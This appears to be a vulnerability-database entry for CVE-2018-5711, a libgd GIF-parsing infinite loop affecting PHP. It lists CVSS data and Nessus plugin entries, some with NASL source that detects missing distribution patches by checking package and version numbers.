Vulnerabilities > CVE-2018-5711 - Infinite Loop vulnerability in multiple products

047910
CVSS 5.5 - MEDIUM
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
HIGH
local
low complexity
php
debian
canonical
CWE-835
nessus

Summary

gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.

Vulnerable Configurations

Part Description Count
Application
Php
950
OS
Debian
2
OS
Canonical
3

Nessus

  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2018-109.NASL
    descriptionThis update for gd fixes one issues. This security issue was fixed : - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) This update was imported from the SUSE:SLE-12:Update update project.
    last seen2020-06-05
    modified2018-02-01
    plugin id106543
    published2018-02-01
    reporterThis script is Copyright (C) 2018-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/106543
    titleopenSUSE Security Update : gd (openSUSE-2018-109)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from openSUSE Security Update openSUSE-2018-109.
    #
    # The text description of this plugin is (C) SUSE LLC.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(106543);
      script_version("3.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2018-5711");
    
      script_name(english:"openSUSE Security Update : gd (openSUSE-2018-109)");
      script_summary(english:"Check for the openSUSE-2018-109 patch");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote openSUSE host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "This update for gd fixes one issues.
    
    This security issue was fixed :
    
      - CVE-2018-5711: Prevent integer signedness error that
        could have lead to an infinite loop via a crafted GIF
        file allowing for DoS (bsc#1076391)
    
    This update was imported from the SUSE:SLE-12:Update update project."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugzilla.opensuse.org/show_bug.cgi?id=1076391"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected gd packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P");
      script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gd");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gd-32bit");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gd-debuginfo");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gd-debuginfo-32bit");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gd-debugsource");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:gd-devel");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.3");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2018/01/31");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/02/01");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2018-2020 Tenable Network Security, Inc.");
      script_family(english:"SuSE Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/SuSE/release");
    if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
    if (release !~ "^(SUSE42\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.3", release);
    if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    ourarch = get_kb_item("Host/cpu");
    if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
    if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);
    
    flag = 0;
    
    if ( rpm_check(release:"SUSE42.3", reference:"gd-2.1.0-24.1") ) flag++;
    if ( rpm_check(release:"SUSE42.3", reference:"gd-debuginfo-2.1.0-24.1") ) flag++;
    if ( rpm_check(release:"SUSE42.3", reference:"gd-debugsource-2.1.0-24.1") ) flag++;
    if ( rpm_check(release:"SUSE42.3", reference:"gd-devel-2.1.0-24.1") ) flag++;
    if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"gd-32bit-2.1.0-24.1") ) flag++;
    if ( rpm_check(release:"SUSE42.3", cpu:"x86_64", reference:"gd-debuginfo-32bit-2.1.0-24.1") ) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
      else security_warning(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gd / gd-32bit / gd-debuginfo / gd-debuginfo-32bit / gd-debugsource / etc");
    }
    
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-2521.NASL
    descriptionAccording to the versions of the gd package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - Integer overflow in gd_io.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to have unspecified impact via vectors involving the number of horizontal and vertical chunks in an image.(CVE-2016-10168) - Double free vulnerability in the gdImagePngPtr function in libgd2 before 2.2.5 allows remote attackers to cause a denial of service via vectors related to a palette with no colors.(CVE-2017-6362) - Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based buffer overflow.(CVE-2016-3074) - Stack consumption vulnerability in the gdImageFillToBorder function in gd.c in the GD Graphics Library (aka libgd) before 2.2.2, as used in PHP before 5.6.28 and 7.x before 7.0.13, allows remote attackers to cause a denial of service (segmentation violation) via a crafted imagefilltoborder call that triggers use of a negative color value.(CVE-2016-9933) - gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711) - The gdImageCreateFromGd2Ctx function in gd_gd2.c in the GD Graphics Library (aka libgd) before 2.2.4 allows remote attackers to cause a denial of service (application crash) via a crafted image file.(CVE-2016-10167) - The output function in gd_gif_out.c in the GD Graphics Library (aka libgd) allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted image.(CVE-2016-6161) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-05-08
    modified2019-12-04
    plugin id131674
    published2019-12-04
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/131674
    titleEulerOS 2.0 SP2 : gd (EulerOS-SA-2019-2521)
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(131674);
      script_version("1.3");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/07");
    
      script_cve_id(
        "CVE-2016-10167",
        "CVE-2016-10168",
        "CVE-2016-3074",
        "CVE-2016-6161",
        "CVE-2016-9933",
        "CVE-2017-6362",
        "CVE-2018-5711"
      );
    
      script_name(english:"EulerOS 2.0 SP2 : gd (EulerOS-SA-2019-2521)");
      script_summary(english:"Checks the rpm output for the updated packages.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote EulerOS host is missing multiple security updates.");
      script_set_attribute(attribute:"description", value:
    "According to the versions of the gd package installed, the EulerOS
    installation on the remote host is affected by the following
    vulnerabilities :
    
      - Integer overflow in gd_io.c in the GD Graphics Library
        (aka libgd) before 2.2.4 allows remote attackers to
        have unspecified impact via vectors involving the
        number of horizontal and vertical chunks in an
        image.(CVE-2016-10168)
    
      - Double free vulnerability in the gdImagePngPtr function
        in libgd2 before 2.2.5 allows remote attackers to cause
        a denial of service via vectors related to a palette
        with no colors.(CVE-2017-6362)
    
      - Integer signedness error in GD Graphics Library 2.1.1
        (aka libgd or libgd2) allows remote attackers to cause
        a denial of service (crash) or potentially execute
        arbitrary code via crafted compressed gd2 data, which
        triggers a heap-based buffer overflow.(CVE-2016-3074)
    
      - Stack consumption vulnerability in the
        gdImageFillToBorder function in gd.c in the GD Graphics
        Library (aka libgd) before 2.2.2, as used in PHP before
        5.6.28 and 7.x before 7.0.13, allows remote attackers
        to cause a denial of service (segmentation violation)
        via a crafted imagefilltoborder call that triggers use
        of a negative color value.(CVE-2016-9933)
    
      - gd_gif_in.c in the GD Graphics Library (aka libgd), as
        used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x
        before 7.1.13, and 7.2.x before 7.2.1, has an integer
        signedness error that leads to an infinite loop via a
        crafted GIF file, as demonstrated by a call to the
        imagecreatefromgif or imagecreatefromstring PHP
        function. This is related to GetCode_ and
        gdImageCreateFromGifCtx.(CVE-2018-5711)
    
      - The gdImageCreateFromGd2Ctx function in gd_gd2.c in the
        GD Graphics Library (aka libgd) before 2.2.4 allows
        remote attackers to cause a denial of service
        (application crash) via a crafted image
        file.(CVE-2016-10167)
    
      - The output function in gd_gif_out.c in the GD Graphics
        Library (aka libgd) allows remote attackers to cause a
        denial of service (out-of-bounds read) via a crafted
        image.(CVE-2016-6161)
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the EulerOS security advisory. Tenable
    has attempted to automatically clean and format it as much as possible
    without introducing additional issues.");
      # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2521
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9ed38664");
      script_set_attribute(attribute:"solution", value:
    "Update the affected gd packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"patch_publication_date", value:"2019/12/04");
      script_set_attribute(attribute:"plugin_publication_date", value:"2019/12/04");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:gd");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"Huawei Local Security Checks");
    
      script_copyright(english:"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp");
      script_exclude_keys("Host/EulerOS/uvp_version");
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    
    release = get_kb_item("Host/EulerOS/release");
    if (isnull(release) || release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS");
    if (release !~ "^EulerOS release 2\.0(\D|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0");
    
    sp = get_kb_item("Host/EulerOS/sp");
    if (isnull(sp) || sp !~ "^(2)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP2");
    
    uvp = get_kb_item("Host/EulerOS/uvp_version");
    if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP2", "EulerOS UVP " + uvp);
    
    if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu);
    
    flag = 0;
    
    pkgs = ["gd-2.0.35-26.h11"];
    
    foreach (pkg in pkgs)
      if (rpm_check(release:"EulerOS-2.0", sp:"2", reference:pkg)) flag++;
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_HOLE,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gd");
    }
    
  • NASL familyCGI abuses
    NASL idPHP_7_2_1.NASL
    descriptionAccording to its banner, the version of PHP running on the remote web server is 7.2.x prior to 7.2.1. It is, therefore, affected by the following vulnerabilities : - A denial of service (DoS) vulnerability exists in the imagecreatefromgif and imagecreatefromstring functions of the gd_gif_in.c script within GD Graphics Library (libgd) due to an integer signedness error. An unauthenticated, remote attacker can exploit this issue, via a crafted GIF file, to cause the applicaiton to stop responding. (CVE-2018-5711) - A cross-site scripting (XSS) vulnerability exists due to improper validation of .phar file before returning it to users. An unauthenticated, remote attacker can exploit this, by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id105774
    published2018-01-12
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105774
    titlePHP 7.2.x < 7.2.1 Multiple Vulnerabilities
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(105774);
      script_version("1.9");
      script_cvs_date("Date: 2019/11/08");
    
      script_cve_id("CVE-2018-5711", "CVE-2018-5712", "CVE-2018-14884");
      script_bugtraq_id(102742, 102743, 104968);
    
      script_name(english:"PHP 7.2.x < 7.2.1 Multiple Vulnerabilities");
      script_summary(english:"Checks the version of PHP.");
    
      script_set_attribute(attribute:"synopsis", value:
    "The version of PHP running on the remote web server is affected by
    multiple vulnerabilities.");
      script_set_attribute(attribute:"description", value:
    "According to its banner, the version of PHP running on the remote web
    server is 7.2.x prior to 7.2.1. It is, therefore, affected by the
    following vulnerabilities :
    
      - A denial of service (DoS) vulnerability exists in the
        imagecreatefromgif and imagecreatefromstring functions
        of the gd_gif_in.c script within GD Graphics Library
        (libgd) due to an integer signedness error. An
        unauthenticated, remote attacker can exploit this issue,
        via a crafted GIF file, to cause the applicaiton to stop
        responding. (CVE-2018-5711)
    
      - A cross-site scripting (XSS) vulnerability exists due to
        improper validation of .phar file before returning it to
        users. An unauthenticated, remote attacker can exploit
        this, by convincing a user to click a specially crafted
        URL, to execute arbitrary script code in a user's browser
        session. (CVE-2018-5712)
    
      - A denial of service (DoS) vulnerability exists in the
        ext/standard/http_fopen_wrapper.c script due to
        http_header_value possibly being a NULL value in an atoi
        call. An unauthenticated, remote attacker can exploit
        this issue, via a specifically crafted HTTP response, to
        cause the application to stop responding. (CVE-2018-14884)
    
    Note that Nessus has not tested for these issues but has instead
    relied only on the application's self-reported version number.");
      script_set_attribute(attribute:"see_also", value:"http://php.net/ChangeLog-7.php#7.2.1");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to PHP version 7.2.1 or later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-5712");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/01/04");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/01/04");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/01/12");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:php:php");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("php_version.nasl");
      script_require_keys("www/PHP");
      script_require_ports("Services/www", 80);
    
      exit(0);
    }
    
    include("vcf.inc");
    include("vcf_extras.inc");
    include("http.inc");
    include("webapp_func.inc");
    
    vcf::php::initialize();
    
    port = get_http_port(default:80, php:TRUE);
    
    app_info = vcf::php::get_app_info(port:port);
    
    flags = [
      { "xss" : TRUE }
    ];
    
    constraints = [
      { "min_version" : "7.2.0alpha0", "fixed_version" : "7.2.1" }
    ];
    
    vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING, flags:flags);
    
  • NASL familySlackware Local Security Checks
    NASL idSLACKWARE_SSA_2020-083-01.NASL
    descriptionNew gd packages are available for Slackware 14.2 and -current to fix security issues.
    last seen2020-03-26
    modified2020-03-24
    plugin id134850
    published2020-03-24
    reporterThis script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/134850
    titleSlackware 14.2 / current : gd (SSA:2020-083-01)
  • NASL familyCGI abuses
    NASL idPHP_7_1_13.NASL
    descriptionAccording to its banner, the version of PHP running on the remote web server is 7.1.x prior to 7.1.13. It is, therefore, affected by the following vulnerabilities : - A denial of service (DoS) vulnerability exists in the imagecreatefromgif and imagecreatefromstring functions of the gd_gif_in.c script within GD Graphics Library (libgd) due to an integer signedness error. An unauthenticated, remote attacker can exploit this issue, via a crafted GIF file, to cause the applicaiton to stop responding. (CVE-2018-5711) - A cross-site scripting (XSS) vulnerability exists due to improper validation of .phar file before returning it to users. An unauthenticated, remote attacker can exploit this, by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id105773
    published2018-01-12
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105773
    titlePHP 7.1.x < 7.1.13 Multiple Vulnerabilities
  • NASL familySlackware Local Security Checks
    NASL idSLACKWARE_SSA_2018-034-01.NASL
    descriptionNew php packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix security issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id106586
    published2018-02-05
    reporterThis script is Copyright (C) 2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/106586
    titleSlackware 14.0 / 14.1 / 14.2 / current : php (SSA:2018-034-01)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-0235-1.NASL
    descriptionThis update for gd fixes several issues. This security issue was fixed : - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id106439
    published2018-01-29
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/106439
    titleSUSE SLES11 Security Update : gd (SUSE-SU-2018:0235-1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-0308-1.NASL
    descriptionThis update for php7 fixes several issues. These security issues were fixed : - CVE-2018-5712: Prevent reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file that allowed for information disclosure (bsc#1076220). - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-24
    modified2019-01-02
    plugin id120015
    published2019-01-02
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/120015
    titleSUSE SLES12 Security Update : php7 (SUSE-SU-2018:0308-1)
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2018-BA81E4E4A0.NASL
    descriptionFix CVE-2018-5711 - Potential infinite loop in gdImageCreateFromGifCtx Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2018-03-29
    plugin id108700
    published2018-03-29
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/108700
    titleFedora 27 : gd (2018-ba81e4e4a0)
  • NASL familyHuawei Local Security Checks
    NASL idEULEROS_SA-2019-2649.NASL
    descriptionAccording to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says
    last seen2020-05-08
    modified2019-12-18
    plugin id132184
    published2019-12-18
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/132184
    titleEulerOS 2.0 SP3 : php (EulerOS-SA-2019-2649)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2018-119.NASL
    descriptionThis update for php7 fixes several issues. These security issues were fixed : - CVE-2018-5712: Prevent reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file that allowed for information disclosure (bsc#1076220). - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) This update was imported from the SUSE:SLE-12:Update update project.
    last seen2020-06-05
    modified2018-02-01
    plugin id106550
    published2018-02-01
    reporterThis script is Copyright (C) 2018-2020 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/106550
    titleopenSUSE Security Update : php7 (openSUSE-2018-119)
  • NASL familyCGI abuses
    NASL idPHP_7_0_27.NASL
    descriptionAccording to its banner, the version of PHP running on the remote web server is 7.0.x prior to 7.0.27. It is, therefore, affected by the following vulnerabilities : - A denial of service (DoS) vulnerability exists in the imagecreatefromgif and imagecreatefromstring functions of the gd_gif_in.c script within GD Graphics Library (libgd) due to an integer signedness error. An unauthenticated, remote attacker can exploit this issue, via a crafted GIF file, to cause the applicaiton to stop responding. (CVE-2018-5711) - A cross-site scripting (XSS) vulnerability exists due to improper validation of .phar file before returning it to users. An unauthenticated, remote attacker can exploit this, by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id105772
    published2018-01-12
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105772
    titlePHP 7.0.x < 7.0.27 Multiple Vulnerabilities
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-1651.NASL
    descriptionSeveral issues in libgd2, a graphics library that allows to quickly draw images, have been found. CVE-2019-6977 A potential double free in gdImage*Ptr() has been reported by Solmaz Salimi (aka. Rooney). CVE-2019-6978 Simon Scannell found a heap-based buffer overflow, exploitable with crafted image data. CVE-2018-1000222 A new double free vulnerabilities in gdImageBmpPtr() has been reported by Solmaz Salimi (aka. Rooney). CVE-2018-5711 Due to an integer signedness error the GIF core parsing function can enter an infinite loop. This will lead to a Denial of Service and exhausted server resources. For Debian 8
    last seen2020-06-01
    modified2020-06-02
    plugin id121483
    published2019-01-31
    reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/121483
    titleDebian DLA-1651-1 : libgd2 security update
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-0260-1.NASL
    descriptionThis update for gd fixes one issues. This security issue was fixed : - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id106470
    published2018-01-30
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/106470
    titleSUSE SLED12 / SLES12 Security Update : gd (SUSE-SU-2018:0260-1)
  • NASL familySuSE Local Security Checks
    NASL idSUSE_SU-2018-0216-1.NASL
    descriptionThis update for php5 fixes several issues. These security issues were fixed : - CVE-2018-5712: Prevent reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file that allowed for information disclosure (bsc#1076220) - CVE-2018-5711: Prevent integer signedness error that could have lead to an infinite loop via a crafted GIF file allowing for DoS (bsc#1076391) Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-03-24
    modified2019-01-02
    plugin id120013
    published2019-01-02
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/120013
    titleSUSE SLES12 Security Update : php5 (SUSE-SU-2018:0216-1)
  • NASL familyDebian Local Security Checks
    NASL idDEBIAN_DLA-1248.NASL
    descriptionIt was discovered that there was a denial of service attack in the libgd2 image library. A corrupt file could have exploited a signedness confusion leading to an infinite loop. For Debian 7
    last seen2020-03-17
    modified2018-01-19
    plugin id106175
    published2018-01-19
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/106175
    titleDebian DLA-1248-1 : libgd2 security update
  • NASL familyCGI abuses
    NASL idPHP_5_6_33.NASL
    descriptionAccording to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.33. It is, therefore, affected by multiple vulnerabilities : - A potential infinite loop in gdImageCreateFromGifCtx. (CVE-2018-5711) - A reflected XSS in .phar 404 page exists due to improper validation of user-supplied input before returning it to users. An unauthenticated, remote attacker can exploit this, by convincing a user to click a specially crafted URL, to execute arbitrary script code in a user
    last seen2020-06-01
    modified2020-06-02
    plugin id105771
    published2018-01-12
    reporterThis script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/105771
    titlePHP 5.6.x < 5.6.33 Multiple Vulnerabilities
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2018-331AF74020.NASL
    descriptionFix CVE-2018-5711 - Potential infinite loop in gdImageCreateFromGifCtx Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2018-04-05
    plugin id108836
    published2018-04-05
    reporterThis script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/108836
    titleFedora 26 : gd (2018-331af74020)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201903-18.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201903-18 (GD: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in GD. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could entice a user to process a specially crafted image, possibly resulting in execution of arbitrary code or a Denial of Service condition. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id123424
    published2019-03-28
    reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/123424
    titleGLSA-201903-18 : GD: Multiple vulnerabilities
  • NASL familyFedora Local Security Checks
    NASL idFEDORA_2018-1AEAC808CE.NASL
    descriptionFix CVE-2018-5711 - Potential infinite loop in gdImageCreateFromGifCtx Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen2020-06-05
    modified2019-01-03
    plugin id120264
    published2019-01-03
    reporterThis script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
